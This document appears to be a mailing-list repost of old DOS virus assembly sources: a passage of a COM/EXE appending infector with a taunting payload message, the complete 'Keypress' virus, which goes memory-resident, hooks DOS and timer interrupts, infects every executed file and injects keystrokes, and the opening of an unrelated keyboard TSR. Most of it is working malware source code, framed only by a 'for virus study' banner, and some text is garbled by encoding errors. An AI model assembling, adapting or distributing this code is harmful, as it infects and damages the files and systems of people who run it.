int 21h ; Call DOS to do it

; Save original directory.

mov ah,47h ; DOS get current directory
lea si,[bp+ORIG_DIR] ; Store it here
mov dl,0 ; Current drive
int 21h ; Call DOS to do it

; Search for a file to infect.

SEARCH: lea dx,[bp+EXE_MASK] ; Search for any EXE file
call FINDFIRST ; Begin search
lea dx,[bp+COM_MASK] ; Search for any COM file
call FINDFIRST ; Begin search

mov ah,3bh ; DOS change directory
lea dx,[bp+DOTDOT] ; Go up one direcotry
int 21h ; Call DOS to do it
jnc SEARCH ; Go look for more files

; Restore default DTA, original directory, and pass control back to
; original program.

QUIT: mov ah,3bh ; DOS change directory
lea dx,[bp+ORIG_DIR-1] ; Point to original directory
int 21h ; Call DOS to do it
push ds ; Save DS
mov ax,2524h ; DOS set interupt vector
lds dx,[bp+OLDINT24] ; Restore INT 24h
int 21h ; Call DOS to do it
pop ds ; Restore DS
mov ah,1ah ; DOS set DTA
mov dx,80h ; Restore original DTA
cmp sp,ID-4 ; EXE or COM? ES,DS on stack
jz QUIT_EXE ; Pass control to host EXE

QUIT_COM: int 21h ; Call DOS to set DTA
retn ; Remember, 100h was on stack

QUIT_EXE: pop es ; Restore original ES
pop ds ; Restore original DS

int 21h ; Call DOS to set DTA

mov ax,es ; AX = begin of PSP segment
add ax,16 ; Add size of PSP to get CS
add word ptr cs:[bp+JMPSAVE2+2],ax ; Restore IP
add ax,word ptr cs:[bp+STACKSAVE2+2] ; Calculate SS
cli ; Clear interrupts
mov sp,word ptr cs:[bp+STACKSAVE2] ; Restore SP
mov ss,ax ; Restore SS
sti ; Set interrupts
db 0eah ; Jump SSSS:OOOO

JMPSAVE2 dd ? ; CS:IP for EXE return
STACKSAVE2 dd ? ; SS:SP for EXE return
JMPSAVE dd ? ; Original EXE CS:IP
STACKSAVE dd ? ; Original EXE SS:SP

CREATOR db '[Joshua]' ; That's me!

; DOS Findfirst / Findnext services

FINDFIRST: mov ah,4eh ; DOS find first service
mov cx,7 ; Choose files w/ any attribute
FINDNEXT: int 21h ; Call DOS to do it
jc END_SEARCH ; Quit if there are errors
; or no more files

; Ok, if I am here, then I found a possible victim. First open the file
; for read only.

mov al,0 ; DOS Open file, read only
call OPEN ; Open the file

; Read in the beginning bytes to check for previous infection and then close.

mov ah,3fh ; DOS Read file
lea dx,[bp+BUFFER] ; Save the original header
mov cx,24 ; Read 24 bytes
int 21h ; Call DOS to do it
mov ah,3eh ; DOS close file
int 21h ; Call DOS to do it

; Check if the file is an EXE.

CHECK_EXE: cmp word ptr [bp+BUFFER],'ZM' ; Is it an EXE?
jne CHECK_COM ; Nope, see if it's a COM
cmp word ptr [bp+BUFFER+16],ID; Is it already infected?
je ANOTHER ; Yep, so try another
jmp short INFECT_EXE ; We got one! Go infect it!

; Check if the file is COMMAND.COM

CHECK_COM: cmp word ptr [bp+DTA+35],'DN' ; Check for COMMAND.COM
jz ANOTHER ; If it is, try another file

; Now, check for previous infection by checking for our presence at
; the end of the file.

mov ax,word ptr [bp+DTA+26] ; Put total filesize in AX
cmp ax,(65535-(ENDHEAP-DECRYPT)); Check if too big
jle ANOTHER ; If so, try another
mov cx,word ptr [bp+BUFFER+1] ; Put jmp offset in CX
add cx,END_VIRUS-DECRYPT+3 ; Add virus size to jmp offset
cmp ax,cx ; Compare file size's
jnz INFECT_COM ; If healthy, go infect it

ANOTHER: mov ah,4fh ; Otherwise find another
jmp short FINDNEXT ; possible victim

END_SEARCH: retn ; No files found

;*** Subroutine INFECT_COM ***

INFECT_COM:

; Save the first three bytes of the COM file

lea si,[bp+BUFFER] ; Start of first 3 bytes
lea di,[bp+COM_START] ; Store them here
movsw ; Transfer the 3 bytes
movsb

; Calculate jump offset for header of victim so it will run virus first.
; AX has the filesize. Store new JMP and OFFSET in the buffer.

mov cx,3 ; No. bytes to write in header
sub ax,cx ; Filesize - jmp_offset
mov byte ptr [si-3],0e9h ; Store new JMP command
mov word ptr [si-2],ax ; plus offset
add ax,(103h+(START_VIRUS-DECRYPT)); New START_VIRUS OFFSET
push ax ; Save it for later
jmp DONE_INFECTION ; We're done!

;*** Subroutine INFECT_EXE ***

INFECT_EXE:

; Save original CS:IP and SS:SP.

les ax,dword ptr [bp+BUFFER+20] ; Get original CS:IP
mov word ptr [bp+JMPSAVE],ax ; Store IP
mov word ptr [bp+JMPSAVE+2],es ; Store CS
les ax,dword ptr [bp+BUFFER+14] ; Get original SS:SP
mov word ptr [bp+STACKSAVE],es ; Store SP
mov word ptr [bp+STACKSAVE+2],ax ; Store SS

; Get get the header size in bytes.

mov ax,word ptr [bp+BUFFER+8] ; Get header size
mov cl,4 ; Convert paragraphs to bytes
shl ax,cl ; Multiply by 16
xchg ax,bx ; Put header size in BX

; Get file size.

les ax,[bp+offset DTA+26] ; Get filesize to
mov dx,es ; DX:AX format

push ax ; Save filesize
push dx

sub ax,bx ; Subtract header size
sbb dx,0 ; from filesize

mov cx,16 ; Convert to SEGMENT:OFFSET
div cx ; form

; Store new entry point (CS:IP) in header.

mov word ptr [bp+BUFFER+20],dx; Store IP
mov word ptr [bp+BUFFER+22],ax; Store CS

add dx,START_VIRUS-DECRYPT ; New START_VIRUS offset
mov bx,dx ; Hold it for now

; Store new stack frame (SS:SP) in header.

mov word ptr [bp+BUFFER+14],ax; Store SS
mov word ptr [bp+BUFFER+16],ID; Store SP

pop dx ; Get back filesize
pop ax

add ax,END_VIRUS-START_VIRUS ; Add virus size
adc dx,0 ; to filesize

push ax ; Save AX
mov cl,9 ; Divide AX
shr ax,cl ; by 512
ror dx,cl
stc ; Set carry flag
adc dx,ax ; Add with carry
pop ax ; Get back AX
and ah,1 ; Mod 512

; Store new filesize in header.

mov word ptr [bp+BUFFER+4],dx ; Store new filesize
mov word ptr [bp+BUFFER+2],ax

push cs ; Restore ES
pop es
mov cx,24 ; No. bytes to write in header

push bx ; Save START_VIRUS offset

; Write virus to victim and restore the file's original timestamp, datestamp,
; and attributes. These values were stored in the DTA by the
; Findfirst / Findnext services.

DONE_INFECTION:
push cx ; Save no. bytes to write
xor cx,cx ; Clear attributes
call SET_ATTR ; Set attributes

mov al,2 ; DOS open file for read/write
call OPEN ; Open the file

; Write the new header at the beginning of the file.

mov ah,40h ; DOS write to file
pop cx ; Number of bytes to write
lea dx,[bp+BUFFER] ; Point to the bytes to write
int 21h ; Call DOS to do it

; Move to end of file.

mov ax,4202h ; DOS set read/write pointer
xor cx,cx ; Set offset move to zero
cwd ; Equivalent to xor dx,dx
int 21h ; Call DOS to do it

; Append virus to end of file.

mov ah,2ch ; DOS get time
int 21h ; Call DOS to do it
mov [bp+KEY],dx ; Save sec + 1/100 sec
; as the new KEY

lea di,[bp+APPEND] ; to the heap
mov cx,START_VIRUS-DECRYPT ; Number of bytes to move
mov al,53h ; Push BX and store it
stosb ; in the append routine
lea si,[bp+DECRYPT] ; Move Crypt routines
push si ; Save SI
push cx ; Save CX
rep movsb ; Transfer the data

lea si,[bp+WRITE_START] ; Now copy the write
mov cx,WRITE_END-WRITE_START ; routine to the heap
rep movsb ; Transfer the data

pop cx ; Get back
pop si ; CX and SI
rep movsb ; Recopy Crypt routine

mov ax,0c35bh ; Tack a POP BX and
stosw ; RETN on the end

pop ax ; New START_VIRUS offset
mov word ptr [bp+DECRYPT+1],ax; Store new offset

call APPEND ; Write the file

; Restore original creation date and time.

mov ax,5701h ; DOS set file date & time
mov cx,word ptr [bp+DTA+22] ; Set time
mov dx,word ptr [bp+DTA+24] ; Set date
int 21h ; Call DOS to do it

; Close the file.

mov ah,3eh ; DOS close file
int 21h ; Call DOS to do it

; Restore original file attributes.

mov cx,word ptr [bp+DTA+21] ; Get original file attribute
call SET_ATTR ; Set attribute

pop bx ; Take CALL off stack

; ****** B O M B S E C T I O N ******

; Check to see if the virus is ready to activate.
; Put all activation tests and bombs here.

CONDITIONS: ; mov ah,2ah ; DOS get date
; int 21h ; Call DOS to do it
; cmp dx,1001h ; Check for Oct 1st
; jl BOMB_DONE ; Not time yet
; mov ah,2ch ; DOS get time
; int 21h ; Call DOS to do it
; cmp cl,25h ; Check for 25 min past
; jl BOMB_DONE ; Not time yet

BOMB: mov ah,3h ; BIOS find cursor position
mov bh,0 ; Video page 0
int 10h ; Call BIOS to do it
push dx ; Save original Row and Column
mov cx,6 ; Number of lines to print
lea si,[bp+VERSE] ; Location of VERSE
mov dx,080ah ; Row and Column of output
PRINTLOOP: mov ah,2h ; BIOS set cursor
int 10h ; Set cursor
push dx ; Save Row and Column
mov ah,9h ; DOS print string
mov dx,si ; Location of VERSE
int 21h ; Call DOS to print it
pop dx ; Get Row and Column
inc dh ; Increment Row
add si,54 ; Go to next line of VERSE
loop PRINTLOOP ; Print all lines

mov ah,00h ; Read character from keybd
int 16h

pop dx ; Get original Row Column
mov ah,2h ; BIOS set cursor
int 10h ; Call BIOS to do it

BOMB_DONE: jmp QUIT ; Go back to host program

VERSE: db 'مننننننننننننننننننننننننننننننننننننننننننننننننننن‍$'
db 'ک Guess what ??? ک$'
db 'ک You have been victimized by a virus!!! Do not ک$'
db 'ک try to reboot your computer or even turn it ک$'
db 'ک off. You might as well read this and weep! ک$'
db 'ُننننننننننننننننننننننننننننننننننننننننننننننننننن?',7,7,'$'

; Write routine to append the virus to the end of the file.

WRITE_START:
pop bx ; Get back file handle
push bx ; Save it again
mov ah,40h ; DOS write to file
mov cx,END_VIRUS-DECRYPT ; Length of virus
lea dx,[bp+DECRYPT] ; Start from beginning of virus
int 21h ; Call DOS to do it
WRITE_END:

; New INT 24h handler.

NEWINT24: mov al,3 ; Fail call
iret ; Return

;*** Subroutine OPEN ***
; Open a file. Takes AL as parameter.

OPEN proc near
mov ah,3dh ; DOS open file, read/write
lea dx,[bp+DTA+30] ; Point to filename we found
int 21h ; Call DOS to do it
xchg ax,bx ; Put file handle in BX
retn ; Return
OPEN endp

;*** Subroutine SET_ATTR ***
; Takes CX as a parameter

SET_ATTR proc near
mov ax,4301h ; DOS change file attr
lea dx,[bp+DTA+30] ; Point to file name
int 21h ; Call DOS
retn ; Return
SET_ATTR endp

; This area will hold all variables to be encrypted

COM_MASK db '*.com',0 ; COM file mask
EXE_MASK db '*.exe',0 ; EXE file mask
DOTDOT db '..',0 ; Go up one directory
COM_START db 0cdh,20h,0 ; Header for infected file
BACKSLASH db '\' ; Backslash for directory

START endp

END_VIRUS equ $ ; Mark end of virus code

; This data area is a scratch area and is not included in virus code.

ORIG_DIR db 64 dup(?) ; Holds original directory

OLDINT24 dd ? ; Storage for old INT 24 vector

BUFFER db 24 dup(?) ; Read buffer and EXE header

DTA db 43 dup(?) ; New DTA location

APPEND: db (START_VIRUS-DECRYPT)*2+(WRITE_END-WRITE_START)+3 dup(?)

ENDHEAP:

end MAIN

Hص ر ×زدؤإ ×سإ سثءعءج... يدضإش إفإ قشد ؤدآء×جہ ذدشدح...
[–] ًدثء _All_ !

ژ،ڈ،پ،ژ،پپ،، DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2،5080ژ244،0 FTP://87.224.224.182

... ىہآء - ؤدزداد, دقإخط ؤدزداد.

John Zaicev

unread,

May 14, 2012, 2:42:46 AM5/14/12

to

[√] Привет _All_ !

;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;********************************************************
; Source code of the Keypress Virus - Made by XSTC
; Made in A86 v3.07
;
; The Keypress Virus installs itself in top of DOS
; memory, without using DOS resident functions. It will
; hook int 1Ch (timer) and 21h (DOS) and will copy every
; 10 minutes during 2 seconds the keys you press five
; times (so if you press '1' it will be '111111') - if
; you press no key, it will usually give ESCs.
;
; In DOS 3+ it spreads to every file executed - so it
; can, besides COM/EXE, infect DRV/OVL/etc.
; It also spreads itself in DOS 1 and 2 with a special
; routine - in this case only COM/EXE files will be
; infected.
;
; It adds, after making full paragraphs of the file
; length, 1232 bytes to COM-files and 1216 to EXE.
;
; This code is only made to show the possibilities and
; dangers of a virus. It is only intended for research
; purposes - spreading a virus is prohibited by law.
;
; NOTE - The compiled code is not 100% compatible with
; the Keypress virus. A86 compiles the 'ADD BX,AX' and
; 'MOV DI,SI' different. This has totally no effect
; on the program.
;********************************************************

; After compiling the new virus, enter the new size in paragraphs in VirParSize
; and compile again.

VirParSize equ 4Ch ; Size of the original KeyPress
virus

VirStart: jmp long VirBegin
db 0

ComStart: mov bx,cs ; When the virus has infected a .COM
file,
add bx,[102h] ; this is the jump to the virus.
Actually,
push bx ; this code is overwritten with the
code
mov bx,offset VirBegin ; in the end of the
virus.
push bx
retf

EB02 dw 02EBh ; 'jmp 104' - first 2 bytes in .COM
file

VirSize dw VirParSize shl 4 ; Size of virus in whole
pars

VirPars dw VirParSize + 1 ; Size of virus in
pars+1

MaxComSize dw 0FF00h-VirParSize ; Max. size .COM file to infect (100h
stack)

Com_or_exe db 00h ; 0 = Com-File, 1 =
Exe-File
R_Ax dw (?)
R_Bx dw (?)
R_Cx dw (?)
R_Dx dw (?)
R_Di dw (?)
R_Si dw (?)
R_Bp dw (?)
R_Es dw (?)
R_Ds dw (?)
R_SS dw (?)
R_SP dw (?)

Exe_CS dw (?)
Exe_IP dw (?)

VirBegin: call Save_Regs ; Start of
virus
call Fix_cs_ss ; Fix CS and SS of orig. prog (for .EXE
files)
call Get_cs_ip ; Get CS and IP of original
prog
call Check_res ; Check virus already
resident
jb Exit_inst ; Yes,
quit

call Inst_mem ; Install in
memory
jb Exit_inst ; Error,
quit

call Inst_ints ; Hook
interrupts
Exit_Inst: jmp short Rst_regs_prg
nop

Jmp_Prg: db 0EAh ; Jump to original
program
PrgOfs dw (?)
PrgSeg dw (?)

Check_res: push ds
xor bx,bx
mov ds,bx
mov bx,600h ; Unused word in
memory
cmp word ptr [bx],1 ; Already
installed?
jz Installed ;
Yes

mov word ptr [bx],1 ;
No
stc

Installed: cmc
pop ds
ret

;*** For .EXE: Fix orig-prog CS and SS ***

Fix_cs_ss: test byte ptr [Com_or_exe],1
jz no_exe

mov ax,es
add ax,10h
add Exe_cs,ax
add R_ss,ax

No_Exe: ret

;*** Get CS + IP of orig. program, and for .COM: Restore first 16 bytes ***

Get_cs_ip: mov ax,[Exe_cs]
mov bx,[Exe_ip]
test byte ptr [Com_or_exe],1
jnz No_rest ; .EXE file: no restore of first
bytes

mov ax,es
mov bx,100h
mov cx,10h
mov si,offset First_bytes
mov di,100h
cld
repz ; Restore first 16 bytes (.COM
file)
movsb

No_rest: mov [Prgseg],ax
mov [Prgofs],bx
ret

;*** Proc: Save the registers to restore them after the virus has ended ***

Save_Regs: mov cs:R_ds,ds
push cs
pop ds
mov R_ax,ax
mov R_bx,bx
mov R_cx,cx
mov R_dx,dx
mov R_di,di
mov R_si,si
mov R_bp,bp
mov R_es,es
ret

;*** Restore regs for original program ***

Rst_regs_prg: mov ax,R_ax
mov bx,R_bx
mov cx,R_cx
mov dx,R_dx
mov bp,R_bp
mov di,R_di
mov si,R_si
mov es,R_es
test byte ptr [Com_or_exe],1
jz No_StackRest ; No stack restore for .COM
files

cli
mov ss,[R_ss] ; Restore .EXE
stack
mov sp,[R_sp]
sti

No_StackRest: mov ds,R_ds
jmp short jmp_prg

;*** Restore regs for interrupts ***

Rst_regs_int: mov ax,R_ax
mov bx,R_bx
mov cx,R_cx
mov dx,R_dx
mov bp,R_bp
mov di,R_di
mov si,R_si
mov es,R_es
mov ds,R_ds
ret

;*** Proc: Search for last MCB ***

Last_MCB: push ds
mov bx,es
dec bx

Next_MCB: mov ds,bx
cmp byte ptr [0],5Ah ; Last
MCB?
jz Is_last ;
Yes
inc bx
add bx,[3] ; Go to
next
cmp bx,0A000h ; In
ROM?
jb Next_MCB ; No, try next
one

Is_Last: pop ds
ret

;*** Proc: Install virus in end of memory ***

Inst_Mem: call Last_mcb ; Search last
MCB
cmp bx,0A000h ; In
ROM?
jb Not_ROM ; No,
continue

No_Inst: push cs ; Yes,
quit
pop ds
stc ; Error, virus not
installed
ret

Not_ROM: mov ds,bx
mov ax,[3] ; AX = Size last
MCB
sub ax,cs:[VirPars] ; - (Virussize in
pars+1)
jbe no_inst ; Not enough memory,
quit
cmp ax,800h
jb no_inst ; Less than 2048 pars free,
quit
mov [3],ax ; Give program less space to install
virus
add bx,ax
inc bx ; BX = seg where virus
comes
mov es:[2],bx ; Enter in PSP, program not allowed
there
sub bx,10h ; - 10h pars (virus starts at
100h)
push bx
push cs
pop ds
pop es
mov si,100h
mov di,si
mov cx,[VirSize] ; CX =
virussize
cld
repz ; Copy virus to
virus-segment
movsb
clc ; No error, virus
installed
ret

;*** Install new interrupts (1C - Timer Tick, 21 - DOS) ***

Inst_Ints: push es
pop ds
mov word ptr [Ticks],0
mov ax,351Ch ; Get Addr Timer
Tick
int 21h
mov I1c_ofs,bx
mov I1c_seg,es
mov ax,3521h ; Get Addr
DOS-Int
int 21h
mov I21_ofs,bx
mov I21_seg,es
mov ax,251Ch
mov dx,offset New_I1c
int 21h ; Install New Timer-Tick
Int
mov dx,offset I21_dos12
push dx
mov ah,30h ; Get
DOS-Version
int 21h
pop dx
cmp al,3 ; Below
3.0?
jb DosBel3
mov dx,offset new_I21 ; No, new
int
DosBel3: mov ax,2521h ; Install new
DOS-Int
int 21h
push cs
pop ds
ret

;*** Proc: NEW 1C (TIMER TICK) INTERRUPT ***
; Every 10 minutes this routine sends during 2 sec. 180 extra keys to the
; keyboard-interrupt.

Ticks dw (?)

New_I1c: inc word ptr cs:[Ticks] ; Increment 'Ticks after virus
loaded'
cmp word ptr cs:[Ticks],2A30h ; 10 minutes
passed?
jb org_I1c ; No, go to orig.
I1c
cmp word ptr cs:[Ticks],2A54h ; 2 sec.
passed?
jbe screw_keys ; Not yet, give
ESCs
mov word ptr cs:[Ticks],0 ; Time-counter to
0
jmp short Org_I1c ; Go to orig.
I1c
Screw_Keys: push cx
mov cx,5 ; 5 times /
tick
Put_Key: int 9 ; Give extra
key
loop Put_key
pop cx
Org_I1c: db 0EAh ; Jump far to orig.
I1c
I1c_Ofs dw (?)
I1c_Seg dw (?)

New_I24: mov al,0

New_I23: iret

I23_Ofs dw (?)
I23_Seg dw (?)

I24_Ofs dw (?)
I24_Seg dw (?)

ProgSize dw (?) ; Program size in
paragraphs

New_I21: cmp ax,4B00h ; New DOS Int for DOS 3
+
jz Is_Start
jmp far dword ptr cs:[I21_Ofs] ; Jmp orig. I
21
Is_Start: call Save_Regs
call InstCritInt ; Install new ^c and crit. err.
int
mov ax,3D02h ; Open file for read and
write
mov ds,R_Ds
int 21h
push cs
pop ds
jc Close_File
mov bx,ax
call Read_header
jc Close_File
call Write_virus
jc Close_File
call Write_header
Close_File: mov ah,3Eh ; Close
file
int 21h
call RestCritInt ; Restore ^c and crit-err
ints
call Rst_regs_int
jmp far dword ptr cs:[I21_Ofs]

I21_Dos12: cmp ah,3Dh ; New DOS-Int for DOS 1.x and
2.x
jz Is_Open

JmpDos: db 0EAh ; Jump
Far
I21_Ofs dw (?)
I21_Seg dw (?)

Is_Open: push ax ;
Network-flags?
and al,0FCh
pop ax
jnz JmpDos ; Yes ->
DOS

call Save_Regs

call InstCritInt ; Install new ^c and crit. err.
int

mov DS,R_Ds
or al,2 ; Write
access
pushf
cli
call far cs:[I21_Ofs] ; Open
file
push cs
pop ds
jc Open_Error ; Error opening ->
DOS

pushf
mov [R_Ax],ax ; Save
handle
mov bx,ax

call Chk_Inf ; Check infection is
possible
jc No_Infect ; No ->
quit

call Read_header
jc No_Infect

call Write_virus
jc No_Infect
call Write_header
No_Infect: call Go_file_beg ; Go to begin of
file
call RestCritInt ; Restore ^c and crit-err
ints
call Rst_regs_int
popf
retf 2
Open_Error: call RestCritInt ; Restore ^c and crit-err
ints
call Rst_regs_int
jmp short JmpDos

;*** Proc: Buffer for header of program to infect ***

Head_buf dw 0Ch dup (?)

;*** Proc: Install new ^C and crit. err. interrupt ***

InstCritInt: push ax
push bx
push dx
push ds
push es
push cs
pop ds
mov ax,3523h ; Get Ctrl-Break Int
Addr
int 21h
mov I23_Ofs,bx
mov I23_Seg,es
mov ax,3524h ; Get Crit. Err Int
Addr
int 21h
mov I24_Ofs,bx
mov I24_Seg,es
mov ax,2523h
mov dx,offset New_I23 ; Install new Ctrl-Break
Int
int 21h
mov ax,2524h ; Install new Crit. Err
Int
mov dx,offset New_I24
int 21h
pop es
pop ds
pop dx
pop bx
pop ax
ret

;*** Proc: Restore orig. ctrl-break and crit. err. interrupt ***

RestCritInt: mov ax,2524h ; Rest. orig. crit. err
int
lds dx,dword ptr cs:[I24_Ofs]
int 21h
mov ax,2523h ; Rest. orig. ctrl-break
int
lds dx,dword ptr cs:[I23_Ofs]
int 21h
push cs
pop ds
ret

;*** Read header of file ***

Read_header: mov ah,3Fh
mov dx,offset Head_buf
mov cx,18h
int 21h
jc HeadRead_Err ; Error reading, don't
infect

call Check_infect ; Check file already infected; if not, save
data
jc HeadRead_Err ; Error,
quit

call Calc_data ; Calculate data for infected
file
jc HeadRead_Err ; Error,
quit

HeadRead_Err: ret

;*** Proc: Write virus, and for .COM files, write first 16 bytes behind virus
***

Write_virus: mov ah,40h ; Write virus behind
program
mov cx,[VirSize]
mov dx,100h
int 21h
jc Err_Writ ; Write error,
quit
cmp ax,cx
jnz Err_Writ ; ' ' ' ' ' '
test byte ptr [Com_or_exe],1
jz First_Write
ret

First_Write: mov ah,40h ; Write orig. 1st 16 bytes behind
virus
mov cx,10h
mov dx,offset Head_buf
int 21h
jc Err_Writ ; Write error,
quit
cmp ax,cx
jnz Err_Writ ; ' ' ' ' ' '
clc ; End procedure, no
error
ret

Err_Writ: stc ; End procedure,
error
ret

;*** Proc: .COM: Write jump-to-virus, .EXE: Write header ***

Write_header: call Go_file_beg ; Go to begin of
file
test byte ptr [Com_or_exe],1 ;
.EXE-file?
jnz Exe_header
mov ah,40h ; .COM file - Write 'EB
02'
mov cx,2
mov dx,offset EB02
int 21h
mov ah,40h ; Write program-size in
pars
mov cx,2
mov dx,offset ProgSize
int 21h
mov ah,40h ; Write rest of begin of
virus
mov cx,0Ch
mov dx,104h
int 21h
ret

Exe_header: mov ah,40h ; Write in
File
mov cx,18h
mov dx,offset Head_buf
int 21h
ret

;*** Proc: Change file pointer ***

Cng_file_ptr: mov ax,4200h
int 21h
ret

;*** Proc: Go to begin of file ***

Go_file_beg: xor cx,cx ; Filepointer =
0
xor dx,dx
call Cng_file_ptr ; Change File
Pointer
ret

;*** Proc: Check file is already infected ***

Check_infect: mov si,104h
mov di,offset Head_buf+4
push cs
pop es
mov byte ptr [Com_or_exe],0 ; Flag for
.COM
cmp word ptr [di-04],5A4Dh ; Is
.EXE?
jz Is_Exe
mov cx,0Ch ; No, .COM
file
cld
repz ; Already
infected?
cmpsb
jnz Do_Infect ; Not
yet
Dont_Infect: stc
ret
Do_Infect: clc
ret
Is_Exe: mov byte ptr [Com_or_exe],1 ; Flag for
.EXE
mov cx,[offset Head_buf+14h] ; cx =
Prog-IP
cmp cx,offset VirBegin ; Same as
Vir-IP?
jz Dont_Infect ; Yes,
quit
cmp word ptr [offset Head_buf+0Ch],0 ; Max extra
pars=0?
jz Dont_Infect ; Yes,
quit
mov [Exe_ip],cx ; Save
prog-IP
mov cx,[Head_buf+16h]
mov [Exe_cs],cx ; Save
prog-cs
mov cx,[Head_buf+0Eh]
mov [R_ss],cx ; Save
prog-SS
mov cx,[Head_buf+10h]
mov [R_sp],cx ; Save
prog-SP
jmp short Do_Infect

;*** Proc: Calculate data for infection ***

Calc_data: mov ax,4202h ; Go to
EOF
xor cx,cx
xor dx,dx
int 21h
test al,0Fh ; Size mod 16 = 0 (File is exact x
paragraps)?
jz No_par_add ; Yes, no extra par
added
add ax,10h ; Add
paragraph
adc dx,0 ; Overflow -> Inc
dx
and ax,0FFF0h ; Make
paragraphs
No_par_add: test byte ptr [Com_or_exe],1
jnz Calc_exe
or dx,dx
jnz not_infect
cmp ax,[maxcomsize] ; File too
big?
ja not_infect ; Yes,
quit
cmp ax,[VirSize] ; File too
small?
jbe Not_Infect ; Yes,
quit
mov [ProgSize],ax ; Save
program-size
mov cl,4
shr word ptr [ProgSize],cl ; In
paragraphs
mov dx,ax
xor cx,cx
call Cng_file_ptr ; Go to
EOF
clc
ret
Not_Infect: stc
ret

Calc_exe: push ax
push dx
add ax,100h ; 100 bytes
stack
adc dx,0 ; Overflow - inc
dx
mov cx,dx
mov dx,ax
call Cng_file_ptr ; Go to
EOF
push bx
add ax,[VirSize] ; New
exe-length
adc dx,0
mov bx,200h ; For header: /
512
div bx
or dx,dx
jz No_Correct
inc ax ; Files below 2.000.000h bytes - length
correction
No_Correct: mov [Head_buf+2],dx ; Save new
file-length
mov [Head_buf+4],ax ; ' ' ' ' ' ' ' '
pop bx
pop dx
pop ax
call Calc_cs_ss
mov word ptr [Head_buf+10h],100h ;
Prog-SP=100h
mov word ptr [Head_buf+14h],offset VirBegin ; Set
prog-IP
clc
ret

;*** Proc: Calculate new CS and SS for .EXE file ***

Calc_cs_ss: push cx
mov cx,4
Cs_ss_lp: shr dx,1
rcr ax,1
loop Cs_ss_lp
sub ax,[Head_buf+8] ; Size of
header
sbb dx,0
mov [Head_buf+0Eh],ax ; Save
prog-SS
mov [Head_buf+16h],ax ; Save
prog-cs
pop cx
ret

;*** Check infection is possible ***

Chk_Inf: call Chk_exec ; Check file is
executable
jb Not_exec
call Get_attr ; Check file has no SYS
attr
Not_Exec: ret

;*** Search-paths ***

Com_path db '.COM',0

Exe_path db '.EXE',0

;*** Check file is executable (.COM / .EXE)

Chk_Exec: push es
mov es,R_ds
mov di,dx
xor al,al
mov cx,80h
cld
repnz ; Search
'.'
scasb
jnz not_inf ; No '.'
found
dec di
push di
mov si,offset Com_path+4
mov cx,4
std
repz ; Check
'.COM'
cmpsb
pop di
jnz no_com ; No
.COM
clc
jmp short Infect
nop
Not_Inf: stc

Infect: cld
pop es
ret
No_Com: mov si,offset Exe_path+4
mov cx,4
repz ; Check
'.EXE'
cmpsb
jnz not_inf ; No .EXE either - not
executable
clc
jmp short infect

Get_Attr: push ds
mov ax,4300h ; Get
FileAttr
xor cx,cx
mov ds,R_ds
int 21h
pop ds
jb Bad_Attr ; Error - don't
infect
test cx,4 ;
System-Attr?
jnz Bad_Attr ; Yes, don't
infect
clc
ret

Bad_Attr: stc
ret

First_bytes: int 20h ; First bytes of orig. program - here just 'Go to
DOS'
dw (?)
mov bx,cs ; Overwrites the
begin
add bx,[102h]
push bx
mov bx,offset VirBegin
push bx
retf

;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;

Hу я вроде все сказал... Может еще что добавлю потом...
[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... Береги честь смолоду - полюбишь и козла!

John Zaicev

unread,

May 14, 2012, 2:42:23 AM5/14/12

to

[√] Привет _All_ !

VECTORS SEGMENT AT 0H ;Set up segment to intercept Interrupts
ORG 9H*4 ;The keyboard Interrupt
KEYBOARD_INT LABEL DWORD
ORG 1CH*4 ;Timer Interrupt
TIMER_VECTOR LABEL DWORD
VECTORS ENDS

SCREEN SEGMENT AT 0B000H ;A dummy segment to use as the
SCREEN ENDS ;Extra Segment

ROM_BIOS_DATA SEGMENT AT 40H ;BIOS statuses held here, also keyboard buffer

ORG 1AH
HEAD DW ? ;Unread chars go from Head to Tail
TAIL DW ?
BUFFER DW 16 DUP (?) ;The buffer itself
BUFFER_END LABEL WORD

ROM_BIOS_DATA ENDS

CODE_SEG SEGMENT
ASSUME CS:CODE_SEG
ORG 100H ;ORG = 100H to make this into a .COM file
FIRST: JMP LOAD_KEEPER ;First time through

COPY_RIGHT DB '(C)1985 S.HOLZNER' ;Ascii autograph
PAD DB 20*102 DUP(0) ;Memory storage for pad
PAD_CURSOR DW 9*102 ;Current position in pad
ATTRIBUTE DB 112 ;Pad Attribute -- reverse video
LINE_ATTRIBUTE DB 240 ;Flashing Rev video
OLD_ATTRIBUTE DB 7 ;Original screen attrib: normal
PAD_OFFSET DW 0 ;Chooses 1st 250 bytes or 2nd
FIRST_POSITION DW ? ;Position of 1st char on screen
